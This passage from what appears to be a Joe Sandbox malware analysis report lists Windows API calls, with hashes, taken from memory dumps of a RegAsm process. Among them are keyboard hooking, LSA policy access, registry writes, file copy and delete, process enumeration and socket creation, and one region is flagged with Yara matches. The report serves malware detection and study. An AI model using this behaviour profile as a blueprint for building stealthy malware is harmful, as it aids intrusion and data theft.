                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 790e7666de8a4c7dc8c07a177f95c8a21e6fb9a1760423fa8b71ab2444a0d115
                                  • Instruction ID: 093f94c19135e8b6bd974ae6f08fd81172156843cb772e141b9463b6deb509c5
                                  • Opcode Fuzzy Hash: 790e7666de8a4c7dc8c07a177f95c8a21e6fb9a1760423fa8b71ab2444a0d115
                                  • Instruction Fuzzy Hash: 7331AF755093846FE722CF21DC84FA3FFE8EF06610F08849AE985CB153D264E549CB61
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EB4), ref: 204F119B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: DescriptorSecurity$ConvertString
                                  • String ID:
                                  • API String ID: 3907675253-0
                                  • Opcode ID: 3ce4836539b7002a2fe906fb3d00845c3e0cbf16cdcecfc98677a57d3f5037ac
                                  • Instruction ID: 864fc36995e8eb8659b8b88f4377b4976e782cfe53304b92f76ac90b517ac08c
                                  • Opcode Fuzzy Hash: 3ce4836539b7002a2fe906fb3d00845c3e0cbf16cdcecfc98677a57d3f5037ac
                                  • Instruction Fuzzy Hash: F931C1B21043846FE712CB64DC85FA7FFB8EF46210F08849AE945DB262D724E908CB61
                                  Uniqueness

                                  Uniqueness Score: 0.41%

                                  APIs
                                  • CreateMutexW.KERNEL32(?,?), ref: 204F0531
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  • Opcode ID: 787cb62086c8c4cf092e805c8489af563c3617a8e0e884c862e9c3a5bf1b107e
                                  • Instruction ID: 007ad4eab1eec6838e78044a9a627941ff301bea45af3e015928a545182b3df7
                                  • Opcode Fuzzy Hash: 787cb62086c8c4cf092e805c8489af563c3617a8e0e884c862e9c3a5bf1b107e
                                  • Instruction Fuzzy Hash: E23191B15093846FE712CB65CC84B96FFF8EF46210F08849AE984CB293D365E908CB61
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  APIs
                                  • SetWindowsHookExW.USER32(?,00000EB4,?,?), ref: 204F063E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: HookWindows
                                  • String ID:
                                  • API String ID: 2559412058-0
                                  • Opcode ID: 673e2e72832aaa05f5fa58a07e2c7dbef49c8923df04d08c4138063bfe7fe9e3
                                  • Instruction ID: e15de7f2f76ff714523f702c96446e6839048b965380de0a18217552cbeb4e3d
                                  • Opcode Fuzzy Hash: 673e2e72832aaa05f5fa58a07e2c7dbef49c8923df04d08c4138063bfe7fe9e3
                                  • Instruction Fuzzy Hash: 5C31B97550D3C05FD3038B259C51B62BF78EF47620F0A45DAD8848B553D265A91AC7B2
                                  Uniqueness

                                  Uniqueness Score: 0.60%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileView
                                  • String ID:
                                  • API String ID: 3314676101-0
                                  • Opcode ID: 3180d1c83261d3bd4e801e9e1382bb458d5fb867fad448bca9389a0cc9540122
                                  • Instruction ID: 8349d33f18590ba24fc9da883f3beb9d08c6058366d58d7263f8589a5004b518
                                  • Opcode Fuzzy Hash: 3180d1c83261d3bd4e801e9e1382bb458d5fb867fad448bca9389a0cc9540122
                                  • Instruction Fuzzy Hash: AF31D3B2405784AFE712CB54DC45F96FFF8EF06320F04859AE9848B263D375A909CB61
                                  Uniqueness

                                  Uniqueness Score: 0.27%

                                  APIs
                                  • CopyFileW.KERNEL32(?,?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 204F01A6
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CopyFile
                                  • String ID:
                                  • API String ID: 1304948518-0
                                  • Opcode ID: a3db464e601f723766ca5529509fb48befa10d9077b40df8028b5604f0de2ad2
                                  • Instruction ID: 94c1d19415d9db3df3f1b661e8801bdc616f406202957da3b073b772cf7247c0
                                  • Opcode Fuzzy Hash: a3db464e601f723766ca5529509fb48befa10d9077b40df8028b5604f0de2ad2
                                  • Instruction Fuzzy Hash: 9B318C7150E3C05FD7138B748C59A56BFB4EF43210B0A84DBE885CF2A3D229A909CB32
                                  Uniqueness

                                  Uniqueness Score: 0.24%

                                  APIs
                                  • getaddrinfo.WS2_32(?,00000EB4), ref: 204F1E63
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: getaddrinfo
                                  • String ID:
                                  • API String ID: 300660673-0
                                  • Opcode ID: ee4b02a5a2055bd9cb252cd062f26ea49606cb13d02c003f64800fb7b9b0e214
                                  • Instruction ID: 233aa6294dcb99010ebff9b19ec01d4d1adeb0addf99846c0f22b8004b9cfc51
                                  • Opcode Fuzzy Hash: ee4b02a5a2055bd9cb252cd062f26ea49606cb13d02c003f64800fb7b9b0e214
                                  • Instruction Fuzzy Hash: D921D1B1500304AFF721DB54CC88FA6F7ACEF44710F10885AEE499A291DB75AA498B71
                                  Uniqueness

                                  Uniqueness Score: 0.39%

                                  APIs
                                  • DeleteFileW.KERNEL32(?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1BF54
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 161fc5ed7581c514e418b8e2505d1a90b96363a68652d9c32e7156c53d936989
                                  • Instruction ID: adf6160a4b05cbf4b096a79afcac7cd00776e3de9a3c0aca2aad942046285cbe
                                  • Opcode Fuzzy Hash: 161fc5ed7581c514e418b8e2505d1a90b96363a68652d9c32e7156c53d936989
                                  • Instruction Fuzzy Hash: F8316F7550E3C45FD7038B359CA5652BFB49F03224F1D84DBD889CF1A3D269A849CB62
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • LsaOpenPolicy.ADVAPI32(?,00000EB4), ref: 204F0843
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: OpenPolicy
                                  • String ID:
                                  • API String ID: 2030686058-0
                                  • Opcode ID: 488fba505f0672cfc9697c3cd52c3db341a7003aefc40cb150f867e0b40c001d
                                  • Instruction ID: 5457b31df467599563efe1eadf44327146737557314bc9514ac5e0c0964aa749
                                  • Opcode Fuzzy Hash: 488fba505f0672cfc9697c3cd52c3db341a7003aefc40cb150f867e0b40c001d
                                  • Instruction Fuzzy Hash: 892194B15053846FE721DF64DC84FA6FFB8EF46610F08849AE985DB152D364A908CB61
                                  Uniqueness

                                  Uniqueness Score: 2.12%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1DB1AADA
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 829667967c482d7b3e290053db98527feeb33086f7e5c479f088364eecf9364d
                                  • Instruction ID: db205963df738bcb65dd37b01d34ef4f347c83feab70d37610633ef95970b118
                                  • Opcode Fuzzy Hash: 829667967c482d7b3e290053db98527feeb33086f7e5c479f088364eecf9364d
                                  • Instruction Fuzzy Hash: 2F21B5755093C06FD3138B25CC51B62BFB8EF87610F0D85CBE9848B663D225A91AC7B6
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • FormatMessageW.KERNEL32(?,00000EB4,?,?), ref: 204F28BA
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FormatMessage
                                  • String ID:
                                  • API String ID: 1306739567-0
                                  • Opcode ID: 29465fcc2bdaef85341817bd95d83d5e128aa6c605e488ef54f0618853c8fcf0
                                  • Instruction ID: 03628755abf4fbdb43ba7a5050aab5a027382df406ab8b30fb08cd21b72b72d2
                                  • Opcode Fuzzy Hash: 29465fcc2bdaef85341817bd95d83d5e128aa6c605e488ef54f0618853c8fcf0
                                  • Instruction Fuzzy Hash: C321B57190D3C45FD302CB658C51B66BFB4EF87610F0980CBD9848F2A3D624A919C7B2
                                  Uniqueness

                                  Uniqueness Score: 0.07%

                                  APIs
                                  • GetTokenInformation.KERNELBASE(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 204F199C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: InformationToken
                                  • String ID:
                                  • API String ID: 4114910276-0
                                  • Opcode ID: a0ac6d6c0ec865a5176b9809c8f4f0eed847a1c7c9af7da8bbed29b126d58835
                                  • Instruction ID: 23465440e54e5e6cc763f18f4fabd3c91088519cce3879c27eea1d0f6bf89c85
                                  • Opcode Fuzzy Hash: a0ac6d6c0ec865a5176b9809c8f4f0eed847a1c7c9af7da8bbed29b126d58835
                                  • Instruction Fuzzy Hash: D321B2B21053846FE722CF61DC85FA7FBACEF45210F04849AE945DB152D364EA48CBB1
                                  Uniqueness

                                  Uniqueness Score: 0.08%

                                  APIs
                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 204F1345
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileMappingOpen
                                  • String ID:
                                  • API String ID: 1680863896-0
                                  • Opcode ID: 78f4431de3e76463db790a9a6aa99104d398875d853432b2d34b51dfbbb023b2
                                  • Instruction ID: 1d5f9fafddfa50bb3a8ad5019d549da4733eb2b1083733f6aa53400be6badfa9
                                  • Opcode Fuzzy Hash: 78f4431de3e76463db790a9a6aa99104d398875d853432b2d34b51dfbbb023b2
                                  • Instruction Fuzzy Hash: 7B21A1B1505384AFE711CB65CC45F66FFA8EF05220F0884AEED848B292D375E948CB61
                                  Uniqueness

                                  Uniqueness Score: 0.34%

                                  APIs
                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 1DB1ABA5
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 3249c5650fa98e326a8bcb6939650275629acb44c2626de43d3a070197263b70
                                  • Instruction ID: 3cf16e662a5dff0eb63a7fc44c638bfdb274d6e308fe5a0535bee7551897fe0e
                                  • Opcode Fuzzy Hash: 3249c5650fa98e326a8bcb6939650275629acb44c2626de43d3a070197263b70
                                  • Instruction Fuzzy Hash: 1B21BDB1600280AFE722DF25DC84F67FBE8EF08620F048569E9498B252D735F509CB72
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 204F10B0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: adb2f7af1ff99fecb4a9e62cf9fd1b6448356bd994e4d4d96d2d684051293c81
                                  • Instruction ID: 82404a931d0c29a5ee2ebf105e4d042c48b733adf824e0170d83cbb5a94fb72f
                                  • Opcode Fuzzy Hash: adb2f7af1ff99fecb4a9e62cf9fd1b6448356bd994e4d4d96d2d684051293c81
                                  • Instruction Fuzzy Hash: 4D21A172504384AFE721CF51CC84FA7FFB8EF45210F08859AE9859B2A2D725E948CB61
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EB4), ref: 204F119B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: DescriptorSecurity$ConvertString
                                  • String ID:
                                  • API String ID: 3907675253-0
                                  • Opcode ID: efbfb4249e74c1cfe070af3d525ba72c60c59f150b700815517d73504c244bc9
                                  • Instruction ID: 2a24ee1ad5ae52a281be9319d53433619dc3424ffab6aacb0cb8ffdc42790420
                                  • Opcode Fuzzy Hash: efbfb4249e74c1cfe070af3d525ba72c60c59f150b700815517d73504c244bc9
                                  • Instruction Fuzzy Hash: BD2104B1600244AFF720DF68DC84FAAFBACEF45210F14C45AED45DB252D634E905CA71
                                  Uniqueness

                                  Uniqueness Score: 0.41%

                                  APIs
                                  • WriteFile.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1AE09
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: ad9532f8338950e6f9f6994c53f5e66efa024abfed2cb56b1628dd4b0caeb105
                                  • Instruction ID: e481c9134d18bd2c0c306ff4434808205a958978f5a100b6c52721674cb6e502
                                  • Opcode Fuzzy Hash: ad9532f8338950e6f9f6994c53f5e66efa024abfed2cb56b1628dd4b0caeb105
                                  • Instruction Fuzzy Hash: 052192725093806FD722CF21DC84FA6FFB8EF46214F08849AE9459F153C225A909CB72
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • RegSetValueExW.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1A9EC
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: a4b02ba4d32d351efdffd38d11e8e81176da08ab0fd800f217f07678742d874e
                                  • Instruction ID: 652e10ceea0d143a94635eb8e29995c3058c3918c578176f0dbd9dec20aaed1e
                                  • Opcode Fuzzy Hash: a4b02ba4d32d351efdffd38d11e8e81176da08ab0fd800f217f07678742d874e
                                  • Instruction Fuzzy Hash: 3D2190B21047806FE721CF11DC84FA7FFE8EF45610F04849AE9469B252D264E949CB71
                                  Uniqueness

                                  Uniqueness Score: 0.15%

                                  APIs
                                  • TerminateThread.KERNEL32(000000FE,00000000), ref: 00F02F78
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: TerminateThread
                                  • String ID:
                                  • API String ID: 1852365436-0
                                  • Opcode ID: 7793c82ec79c2428207682b383148305938dfb2e6feb53ae70cce6dc9d2de6ad
                                  • Instruction ID: cbde9b2b9c54b2cad6c56e7accc0ea2007323af2c01b5717a54b52c8eb6c69e9
                                  • Opcode Fuzzy Hash: 7793c82ec79c2428207682b383148305938dfb2e6feb53ae70cce6dc9d2de6ad
                                  • Instruction Fuzzy Hash: C31126B1740301AFEB201E688D89FEA3365DF05764FE00252FE129B1D1D7A4D8C2AA25
                                  Uniqueness

                                  Uniqueness Score: 1.31%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1DB1A731
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: e297648b60a11dd998a31c3fa1cb3279dec064ad08b5a50305871972c7b47807
                                  • Instruction ID: a8d44dac9e078b9792fe721af5ed16fc960333e20c741ca15c4620d0ef1d382c
                                  • Opcode Fuzzy Hash: e297648b60a11dd998a31c3fa1cb3279dec064ad08b5a50305871972c7b47807
                                  • Instruction Fuzzy Hash: 1F21CDB2500204AFF721DF54DC84FABFBECEF45620F04855AE9469B252D634E6098AB2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • LoadLibraryA.KERNEL32(?,00000EB4), ref: 1DB1B8BF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 4a52d2f73c695358817bb264a9f20f5e36c56878ed46ff34c32b86962c6b4c38
                                  • Instruction ID: 1db79b76f8e18fcc0fea5b38c4beea7f35023c402ee5f6f90755b40c700cdb0c
                                  • Opcode Fuzzy Hash: 4a52d2f73c695358817bb264a9f20f5e36c56878ed46ff34c32b86962c6b4c38
                                  • Instruction Fuzzy Hash: A721DA715453C46FE712CB11DC85BA2FFA8DF42720F0880DAE9859F193D268AA49CB76
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • SetKernelObjectSecurity.KERNELBASE(?,?,?), ref: 204F20CA
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: KernelObjectSecurity
                                  • String ID:
                                  • API String ID: 3015937269-0
                                  • Opcode ID: 28082c1627735fbf43f471e295606332aee3c9c1021df18786521b2605b66d97
                                  • Instruction ID: 1caf90e5a7663f5bd3db2ddcfd3ef5979c3a1fc05d93ef6b11e1e5c13ea8f1df
                                  • Opcode Fuzzy Hash: 28082c1627735fbf43f471e295606332aee3c9c1021df18786521b2605b66d97
                                  • Instruction Fuzzy Hash: EE21A1755093C45FD712CB24DC54B92BFA4EF47214F0984DAEE848F253D6359908CB71
                                  Uniqueness

                                  Uniqueness Score: 1.51%

                                  APIs
                                  • GetFileType.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1AD3D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID:
                                  • API String ID: 3081899298-0
                                  • Opcode ID: da4543034ba5053069b2e58ec0f5e5af1cf81786277bae6e746426934b23fc46
                                  • Instruction ID: 6bca323b3237137e0b74146f16c0ee00471fbcd1d250632ca38fa58d3ffcbadd
                                  • Opcode Fuzzy Hash: da4543034ba5053069b2e58ec0f5e5af1cf81786277bae6e746426934b23fc46
                                  • Instruction Fuzzy Hash: CB21D8B54097C06FE712CB219C84BA2BFA8DF43710F0880D7E9859F153D264A909C772
                                  Uniqueness

                                  Uniqueness Score: 0.07%

                                  APIs
                                  • LsaOpenPolicy.ADVAPI32(?,00000EB4), ref: 204F0843
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: OpenPolicy
                                  • String ID:
                                  • API String ID: 2030686058-0
                                  • Opcode ID: ce0e2416acaad99164f354827dea812fc99b6607f9e99d07d37c528fe819a3fc
                                  • Instruction ID: f4ffa75fb36f56872be050f4f75debbf4e311f1c340a443cf5fd8fcfbf23e1f0
                                  • Opcode Fuzzy Hash: ce0e2416acaad99164f354827dea812fc99b6607f9e99d07d37c528fe819a3fc
                                  • Instruction Fuzzy Hash: E421A1B1500304AFF720EF54DC84FAAFBA8EF95610F14845AED45DA242D778E905CAB1
                                  Uniqueness

                                  Uniqueness Score: 2.12%

                                  APIs
                                  • CreateMutexW.KERNEL32(?,?), ref: 204F0531
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  • Opcode ID: 3c486cc52149bfa6c1da7c6ca982ca66a6ed0a932909c93bede547444dacb1d0
                                  • Instruction ID: 37da4865b54fd15accea0d4c90c909a84757d1cba3a04cdeb149285dee40e5e3
                                  • Opcode Fuzzy Hash: 3c486cc52149bfa6c1da7c6ca982ca66a6ed0a932909c93bede547444dacb1d0
                                  • Instruction Fuzzy Hash: BC218EB1600244AFE710DF65DC89B56FBE8EF54610F1484AAED48CB242D7B9F908CB75
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1A834
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: b7931f5651ec0cc06c72940e07e8669b44e8f79ef7f962f3792d4c1c0e533b4a
                                  • Instruction ID: 8338ebf532e8fdbd7be7587da471e94424f32a8514a5445c8097e2b972550192
                                  • Opcode Fuzzy Hash: b7931f5651ec0cc06c72940e07e8669b44e8f79ef7f962f3792d4c1c0e533b4a
                                  • Instruction Fuzzy Hash: BD21C075600200AFE721CF15DC84FA7FBECEF44610F04855AE94ADB252D760F60ACAB2
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • GetTokenInformation.KERNELBASE(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 204F199C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: InformationToken
                                  • String ID:
                                  • API String ID: 4114910276-0
                                  • Opcode ID: 78f62872125b28b890cbd84e848c71d8151263879275a999eba7272c05823ee5
                                  • Instruction ID: bd186910e20acf010a1d8ffd20443945780143ac0257a1a04dea19793a203dca
                                  • Opcode Fuzzy Hash: 78f62872125b28b890cbd84e848c71d8151263879275a999eba7272c05823ee5
                                  • Instruction Fuzzy Hash: E511A2B2500244AFE721DF95DC89FABF7ACEF44220F14846AE945DB252D774E604CBB1
                                  Uniqueness

                                  Uniqueness Score: 0.08%

                                  APIs
                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 204F1345
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileMappingOpen
                                  • String ID:
                                  • API String ID: 1680863896-0
                                  • Opcode ID: 2147004f5036c844091ae64cc680222f15a443e80a2e29d1e7be27778f5da1e2
                                  • Instruction ID: 84fa587a8258de2410024d55ec5e8ffbca6730fe3faddb33ef83ddde91775995
                                  • Opcode Fuzzy Hash: 2147004f5036c844091ae64cc680222f15a443e80a2e29d1e7be27778f5da1e2
                                  • Instruction Fuzzy Hash: AD21C0B1600244AFF710DF65CC89B66FBE8EF04620F14846AED488B752D779E908CA76
                                  Uniqueness

                                  Uniqueness Score: 0.34%

                                  APIs
                                  • K32EnumProcesses.KERNEL32(?,?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 204F2C4E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: EnumProcesses
                                  • String ID:
                                  • API String ID: 84517404-0
                                  • Opcode ID: ac3c60fcf81e45a8eecf3c78f77f939bf091e20d01b92db7eff35eee8846b00e
                                  • Instruction ID: 91e9ccace218db3e39c53fc002bd33a2b6ade67f16323e32501cdadc65daeb78
                                  • Opcode Fuzzy Hash: ac3c60fcf81e45a8eecf3c78f77f939bf091e20d01b92db7eff35eee8846b00e
                                  • Instruction Fuzzy Hash: 49215E715093C49FD712CB65DC85B96BFE8EF06210F0984EBE985CB263D335A908CB61
                                  Uniqueness

                                  Uniqueness Score: 0.51%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileView
                                  • String ID:
                                  • API String ID: 3314676101-0
                                  • Opcode ID: 67b41c4ba82ae72184bfbd5fbd2c6841b64fba57421e54915841bd775949fcce
                                  • Instruction ID: 48af8629eb6fb1f68a17d5924597338e16296dba2d79be8e89668b5826167895
                                  • Opcode Fuzzy Hash: 67b41c4ba82ae72184bfbd5fbd2c6841b64fba57421e54915841bd775949fcce
                                  • Instruction Fuzzy Hash: 7E21CD71500244AFE721DF55DC89F96FBE8EF48720F04855EE9888B252D779A608CBA2
                                  Uniqueness

                                  Uniqueness Score: 0.27%

                                  APIs
                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 204F0D6A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Socket
                                  • String ID:
                                  • API String ID: 38366605-0
                                  • Opcode ID: 8eb49019f4dab847a834c9bdf2d3b9fd2182495f752f50eb9c8a7969f6d1812a
